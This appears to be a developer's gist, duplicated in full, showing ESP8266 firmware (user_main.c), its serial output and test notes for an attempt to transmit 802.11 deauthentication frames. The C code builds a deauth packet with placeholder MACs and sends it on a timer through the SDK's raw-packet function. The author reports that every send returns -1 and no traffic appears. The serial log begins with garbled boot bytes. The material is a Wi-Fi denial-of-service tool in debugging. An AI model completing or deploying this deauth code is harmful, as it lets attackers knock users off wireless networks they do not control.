stickytruth/output

## output
rl��r��#�n����p�<�b�$�rrp�l�����p��n�`rn|��n�܀�r����~�n���l`��#�n��;nr���;��?��rp�n���pp��<����b�ľ~�n�����rnr���;��?�l��r��l`�don't use rtc mem data
r�

SDK version:1.4.0
mode : sta(5c:cf:7f:01:5b:09)
add if0
0 = wifi_register_send_pkt_freedom_cb()
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:10:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:20:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:30:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:40:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:50:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:60:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:70:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:80:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:90:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:A0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:B0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:C0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:D0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:E0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:F0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:01:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:11:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:21:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:31:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:41:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:51:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:61:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:71:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:81:01:07:00, 26, 0)

## setup
Hardware: Adafruit Huzzah, uses the ai-thinker ESP-12
Environment: Both Espressif SDK and esp-open-sdk
Testing: Tcpdump captures in linux using a usb wifi card in monitor mode and in osx using built-in wifi in monitor mode.
    There was minimal wifi traffic during tests, basically 1 AP and 2-3 clients on the channel.
Results: No traffic was seen from the esp.

## user_main.c
#include "ets_sys.h"
#include "osapi.h"
#include "gpio.h"
#include "os_type.h"
#include "mem.h"
#include "user_config.h"
#include "user_interface.h"
#include "driver/uart.h"

#define user_procTaskPrio        0
#define user_procTaskQueueLen    1
os_event_t    user_procTaskQueue[user_procTaskQueueLen];
static volatile os_timer_t deauth_timer;

uint16_t seq_n = 0;

// Packet buffer
uint8_t packet_buffer[64];

// Pre-formed packet
uint8_t deauth_packet[26] =  {0xC0, 0x00,                         // Subtype
                              0x00, 0x00,                         // Duration
                              0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, // Client MAC
                              0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, // AP MAC
                              0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, // AP MAC
                              0x00, 0x00,                         // Sequence
                              0x07, 0x00};                        // Reason code
uint16_t deauth_size = 26;

/* A utility to print buffers */
void print_buffer(uint8_t *buf, uint16_t start, uint16_t len) {
	int i;
	for (i = start; i < len; i++) {
		if (i > 0) os_printf(":");
		os_printf("%02X", buf[i]);
	}
}

/* Copies deauth_packet into buf */
void write_packet(uint8_t *buf, uint16_t seq)
{
    uint8_t i=0;
    for (i=0; i<26; i++) buf[i] = deauth_packet[i];
    /* I got desparate for any output here.
    Still didn't observer any traffic.
    buf[0] = seq / 0xFF;
    buf[1] = seq % 0xFF;
    */
    buf[22] = seq % 0xFF;
    buf[23] = seq / 0xFF;
}

/* Sends deauth packets. */
void deauth()//void *arg)
{
    // Sequence number is increased by 16, see 802.11
    seq_n = seq_n + 0x10;
    if (seq_n > 0x2fc) seq_n = 0x00; // 764
    write_packet(packet_buffer, seq_n);
    os_printf("%d = wifi_send_pkt_freedom(", wifi_send_pkt_freedom(packet_buffer, deauth_size, 0));
    print_buffer(packet_buffer, 0, deauth_size);
    os_printf(", %d, 0)\n", deauth_size);
    // wifi_send_pkt_freedom has always returned -1 (fail)
}

/* Callback for sent packets
From the docs:
Note:
   Only after the previous packet was sent, entered the freedom_outside_cb_t,
   the next packet is allowed to send.

I've never seen this get called.
*/
//void ICACHE_FLASH_ATTR callback_send_pkt_freedom(uint8 status)
void callback_send_pkt_freedom(uint8 status)
{
    os_printf_plus("[pkt-cb] %d", status);
}

void ICACHE_FLASH_ATTR
callback_system_init_done(void)
{
    // Set channel
    wifi_set_channel(1);
    // Register callback for sent packets
    os_printf("%d = wifi_register_send_pkt_freedom_cb()\n", wifi_register_send_pkt_freedom_cb(callback_send_pkt_freedom));
    // Has always returned 0 (succeed) for me
}

void ICACHE_FLASH_ATTR
user_init()
{
    uart_init(115200, 115200);
    os_printf("\n\nSDK version:%s\n", system_get_sdk_version());

    wifi_set_opmode(STATION_MODE);
    os_timer_disarm(&deauth_timer);
    os_timer_setfn(&deauth_timer, (os_timer_func_t *) deauth, NULL);
    os_timer_arm(&deauth_timer, CHANNEL_HOP_INTERVAL, 1);

    system_init_done_cb(callback_system_init_done);
}
	rl��r��#�n��p�<�b�$�rrp�l��p��n�`rn\|��n�܀�r��~�n��l`��#�n��;nr��;��?��rp�n��pp��<��b�ľ~�n��rnr��;��?�l��r��l`�don't use rtc mem data
	r�

	SDK version:1.4.0
	mode : sta(5c:cf:7f:01:5b:09)
	add if0
	0 = wifi_register_send_pkt_freedom_cb()
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:10:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:20:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:30:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:40:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:50:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:60:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:70:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:80:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:90:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:A0:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:B0:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:C0:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:D0:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:E0:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:F0:00:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:01:01:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:11:01:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:21:01:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:31:01:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:41:01:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:51:01:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:61:01:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:71:01:07:00, 26, 0)
	-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:81:01:07:00, 26, 0)
	Hardware: Adafruit Huzzah, uses the ai-thinker ESP-12
	Environment: Both Espressif SDK and esp-open-sdk
	Testing: Tcpdump captures in linux using a usb wifi card in monitor mode and in osx using built-in wifi in monitor mode.
	There was minimal wifi traffic during tests, basically 1 AP and 2-3 clients on the channel.
	Results: No traffic was seen from the esp.
	#include "ets_sys.h"
	#include "osapi.h"
	#include "gpio.h"
	#include "os_type.h"
	#include "mem.h"
	#include "user_config.h"
	#include "user_interface.h"
	#include "driver/uart.h"

	#define user_procTaskPrio 0
	#define user_procTaskQueueLen 1
	os_event_t user_procTaskQueue[user_procTaskQueueLen];
	static volatile os_timer_t deauth_timer;

	uint16_t seq_n = 0;

	// Packet buffer
	uint8_t packet_buffer[64];

	// Pre-formed packet
	uint8_t deauth_packet[26] = {0xC0, 0x00, // Subtype
	0x00, 0x00, // Duration
	0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, // Client MAC
	0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, // AP MAC
	0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, // AP MAC
	0x00, 0x00, // Sequence
	0x07, 0x00}; // Reason code
	uint16_t deauth_size = 26;

	/* A utility to print buffers */
	void print_buffer(uint8_t *buf, uint16_t start, uint16_t len) {
	int i;
	for (i = start; i < len; i++) {
	if (i > 0) os_printf(":");
	os_printf("%02X", buf[i]);
	}
	}

	/* Copies deauth_packet into buf */
	void write_packet(uint8_t *buf, uint16_t seq)
	{
	uint8_t i=0;
	for (i=0; i<26; i++) buf[i] = deauth_packet[i];
	/* I got desparate for any output here.
	Still didn't observer any traffic.
	buf[0] = seq / 0xFF;
	buf[1] = seq % 0xFF;
	*/
	buf[22] = seq % 0xFF;
	buf[23] = seq / 0xFF;
	}

	/* Sends deauth packets. */
	void deauth()//void *arg)
	{
	// Sequence number is increased by 16, see 802.11
	seq_n = seq_n + 0x10;
	if (seq_n > 0x2fc) seq_n = 0x00; // 764
	write_packet(packet_buffer, seq_n);
	os_printf("%d = wifi_send_pkt_freedom(", wifi_send_pkt_freedom(packet_buffer, deauth_size, 0));
	print_buffer(packet_buffer, 0, deauth_size);
	os_printf(", %d, 0)\n", deauth_size);
	// wifi_send_pkt_freedom has always returned -1 (fail)
	}

	/* Callback for sent packets
	From the docs:
	Note:
	Only after the previous packet was sent, entered the freedom_outside_cb_t,
	the next packet is allowed to send.

	I've never seen this get called.
	*/
	//void ICACHE_FLASH_ATTR callback_send_pkt_freedom(uint8 status)
	void callback_send_pkt_freedom(uint8 status)
	{
	os_printf_plus("[pkt-cb] %d", status);
	}

	void ICACHE_FLASH_ATTR
	callback_system_init_done(void)
	{
	// Set channel
	wifi_set_channel(1);
	// Register callback for sent packets
	os_printf("%d = wifi_register_send_pkt_freedom_cb()\n", wifi_register_send_pkt_freedom_cb(callback_send_pkt_freedom));
	// Has always returned 0 (succeed) for me
	}

	void ICACHE_FLASH_ATTR
	user_init()
	{
	uart_init(115200, 115200);
	os_printf("\n\nSDK version:%s\n", system_get_sdk_version());

	wifi_set_opmode(STATION_MODE);
	os_timer_disarm(&deauth_timer);
	os_timer_setfn(&deauth_timer, (os_timer_func_t *) deauth, NULL);
	os_timer_arm(&deauth_timer, CHANNEL_HOP_INTERVAL, 1);

	system_init_done_cb(callback_system_init_done);
	}